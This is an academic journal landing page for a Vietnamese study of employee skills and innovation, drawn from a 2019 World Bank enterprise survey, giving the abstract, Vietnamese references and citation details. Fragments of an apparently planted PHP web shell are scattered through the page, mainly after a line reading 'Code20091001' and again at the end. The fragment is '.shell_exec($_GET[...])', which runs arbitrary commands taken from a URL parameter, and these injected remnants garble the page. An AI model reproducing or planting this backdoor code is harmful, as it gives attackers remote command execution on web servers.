Employee’s skills to promote innovation in the enterprise – a perspective from the World Bank’s survey in Vietnam

  • Cao Thi Thu Anh
  • Trinh Bich Lien
Keywords: Innovation, Innovation skills, Enterprises, Vietnam

Abstract

In the framework of the cooperation program between the Ministry of Science and Technology and the World Bank in Vietnam on innovation activities, the World Bank has surveyed a number of enterprises in Vietnam to assess the role of employee's skill to promote innovation. The survey was conducted in 5 provinces in 2019, the research was developed based on the methodologies used by the World Bank that adapted for Vietnam to explore: (i) the innovation skills and innovation activities in Vietnamese enterprises;and (ii) the innovation skills of the workforce in the enterprise. The survey results show that (i) There is a correlation between innovation activities and the skills of employees in the enterprise; (ii) A significant proportion of enterprises, especially innovative firms with medium skills and labor-intensive firms, do not undertake product and marketing innovation; (iii) Lack of innovation skills and limited financial access are two major obstacles that prevent enterprices innovative activities; (iv) Enterprises whose large proportion of employees have high literacy skills as well as the ability to "interact with others" and "manage emotions" are more likely to implement innovation; (v) There is a particularly close correlation between the skills of workers and the innovator in medium-skilled innovative enterprises; and (vi) The skills of managers and technicians have a special relationship with the innovation in the enterprise.

Code20091001

".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>

Downloads

Download data is not yet available.

References

1. Cierra, X., và W. Maloney, (2017). “Nghịch lý đổi mới sáng tạo: Năng lực của quốc gia đang phát triển và hứa hẹn chưa thực hiện về bắt kịp công nghệ”. Tài liệu nghiên cứu 120137. Washington DC, Ngân hàng Thế giới.
2. Cunningham, W., và O. Pimhidzai, (2018). “Việc làm tương lai của Việt Nam: Tận dụng các xu hướng lớn để thịnh vượng hơn”. Washington DC, Ngân hàng Thế giới.
3. Cunningham, W., và P. Villasenor, (2016). “Tiếng nói của người sử dụng lao động, nhu cầu của người sử dụng lao động và ý nghĩa đối với chính sách phát triển kỹ năng công cộng kết nối giữa các ngành lao động và giáo dục.” Tài liệu nghiên cứu chính sách 7582, Washington DC, Ngân hàng Thế giới.
4. Demmel, M. C., J. A. Manez, M. E. Rochina-Barrachina, J. A. Sanchis-Llopis, (2017). “Đổi mới sản phẩm, quy trình và năng suất nhân tố tổng hợp: Bằng chứng sản xuất tại bốn quốc gia Mỹ Latinh”. Tạp chí Kinh tế Phát triển, số 21: 1341-1363.
5. Hallward-Driemeier, M. và G. Nayyar, (2018). Rắc rối đang tới?: Tương lai của phát triển theo định hướng sản xuất. Washington DC, Ngân hàng Thế giới.
6. Hanushek, EA, G.Schwerdt, S.Wiederkeep, L.Woessmann, (2015), “Trở lại các kỹ năng quanh thế giới: Bằng chứng từ PIAAC”, European Economic Review, tháng 01/2015.
7. John, OP, K.Miyamoto và E.Willroth, (2019). “Đổi mới sáng tạo trong đo lường các kỹ năng cảm xúc xã hội bằng cách tự báo cáo: Phân tích tâm lý của BFI-2 ở Uzbekistan, Uganda và Moldova”, Ngân hàng Thế giới.
8. OECD, (2015). Kỹ năng về tiến bộ xã hội: Sức mạnh của kỹ năng xã hội và cảm xúc, OECD Publishing, OECD, Paris.
9. Soto, CJ và OP John, (2008). “Tâm lý học phát triển của Báo cáo Big Five: sự quen thuộc, cấu trúc nhân tố, gắn kết và khác biệt từ 10 đến 20 tuổi”, Journal of Personality and Social Psychology 94 (4) 718-737. American Psychological Association.
10. Kết quả khảo sát doanh nghiệp về đổi mới sáng tạo và kỹ năng tại Việt Nam của Ngân hàng Thế giới năm 2019. Washington DC, Ngân hàng Thế giới (dự thảo).
Published
2021-01-15
How to Cite
Anh, C. T., & Lien, T. (2021, January 15). Employee’s skills to promote innovation in the enterprise – a perspective from the World Bank’s survey in Vietnam. Journal SCIENCE AND TECHNOLOGY POLICIES AND MANAGEMENT, 9(3), 122-134. Retrieved from http://vietnamstijournal.net/index.php/JSTPM/article/view/340
Section
STUDIES OF STRATEGIES AND MANAGEMENT
".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>